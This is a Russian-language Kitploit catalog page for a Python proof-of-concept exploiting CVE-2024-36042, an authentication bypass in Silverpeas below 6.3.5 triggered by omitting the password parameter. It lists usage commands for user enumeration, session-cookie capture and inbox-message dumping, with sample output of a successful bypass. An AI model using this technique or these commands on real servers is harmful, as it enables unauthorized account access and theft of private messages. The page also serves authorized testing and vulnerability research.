Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — Python PoC для обхода аутентификации CVE-2024-36042 в Silverpeas < 6.3.5. Возможности: определение версии, многопоточное перечисление пользователей, извлечение сообщений и структурированная отчётность для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Аутентификация и авторизацияРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Python PoC для обхода аутентификации CVE-2024-36042 в Silverpeas < 6.3.5. Возможности: определение версии, многопоточное перечисление пользователей, извлечение сообщений и структурированная отчётность для авторизованного тестирования безопасности.

Репозиторий
3 месяцев назадЕщё не проверено

Silverpeas-AuthBypass-CVE-2024-36042

Чистый, профессиональный Python3 proof-of-concept для CVE-2024-36042 — обход аутентификации в Silverpeas < 6.3.5, вызванный отсутствием проверки пароля в AuthenticationServlet.

Python 3.8+ License: MIT


Обзор

Silverpeas AuthenticationServlet принимает запрос на вход даже при отсутствии параметра Password в теле POST, предоставляя доступ к аутентифицированной сессии под любым известным именем пользователя. Инструмент ответственно демонстрирует уязвимость через модульный многопоточный каркас эксплойта с расширенной разведкой, извлечением данных и профессиональной генерацией отчётов.

Затронутые версии: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


Возможности


Установка

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Использование

Быстрый тест (встроенный список пользователей)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

Расширенный отчёт (Markdown + консоль)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

Криминалистический экспорт (отдельные файлы для каждого сообщения)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

Только проверка версии (без эксплуатации)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

Через прокси с записью исходного HTML

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Управление выводом

Инструмент поддерживает четыре основных режима вывода для собранных сообщений через --message-output:

  1. console (по умолчанию): выводит очищенные сообщения прямо в терминал с подсветкой ключевых слов.
  2. markdown: создаёт единый отчёт {username}_messages.md для каждой учётной записи в выходном каталоге.
  3. files: создаёт папку для каждой учётной записи и сохраняет каждое сообщение в отдельный файл (например, message_0006.md) с ID, дополненными нулями, для корректной сортировки в файловой системе.
  4. both: объединяет режимы console и markdown.

Структура артефактов

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

Справочник по CLI

root@kitploit:~
-t, --target        Base URL of Silverpeas (required)
-u, --user          Single username to target
--userlist          File with one username per line
--dump-messages     Scrape and display inbox messages
--max-id            Max message ID to check (default: 50)
--threads           Concurrent workers (default: 5)
--proxy             HTTP proxy URL
--message-output    Output mode: {console, markdown, files, both}
--output-format     File format: {md, txt}
--json              Export full JSON report
--csv               Export CSV of scraped messages
--outdir            Output directory for exports
--no-color          Disable ANSI color output (useful for logs)
--save-raw-html     Save original HTML responses for debugging
--check-version     Fingerprint version only
--no-exploit        Skip exploitation (pair with --check-version)
--quiet, -q         Minimal output
--no-banner         Suppress banner

Пример вывода

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

Зачем это существует

Этот репозиторий — часть моего портфолио по offensive-безопасности. Он демонстрирует:

  • Воплощение исследования уязвимостей — превращение раскрытой CVE в рабочий, надёжный эксплойт.
  • Высококачественный инструментарий — надёжная обработка ошибок, многоязычная поддержка и управление структурированным выводом.
  • Операционная осведомлённость — многопоточность, поддержка прокси и логика дедупликации для реалистичных сред.
  • Профессиональная разработка — чистая архитектура кода, исчерпывающая документация и внимание к опыту оператора (UX).

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности, исследований и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте явное разрешение перед тестированием любой инфраструктуры, которая вам не принадлежит.


Лицензия

MIT

Скачать инструмент
ВозможностьОписание
Определение версииОпределяет версию Silverpeas и статус уязвимости до эксплуатации.
МногопоточностьОдновременный перебор пользователей через ThreadPoolExecutor с потокобезопасным выводом.
Расширенное обнаружениеМногоязычное (английский/французский) обнаружение конечных точек с проверкой нескольких ID.
Извлечение данныхВысокоточный сбор сообщений с дедупликацией и фильтрацией шаблонного содержимого.
Гибкий выводПоддержка консоли, Markdown-отчётов и экспорта отдельных файлов (.md или .txt).
Прокси и отладкаМаршрутизация через Burp/ZAP (--proxy) и сохранение исходного HTML для отладки парсера.
Чистый UXASCII-таблицы сводок, подсветка ключевых слов и опциональное управление ANSI-цветами.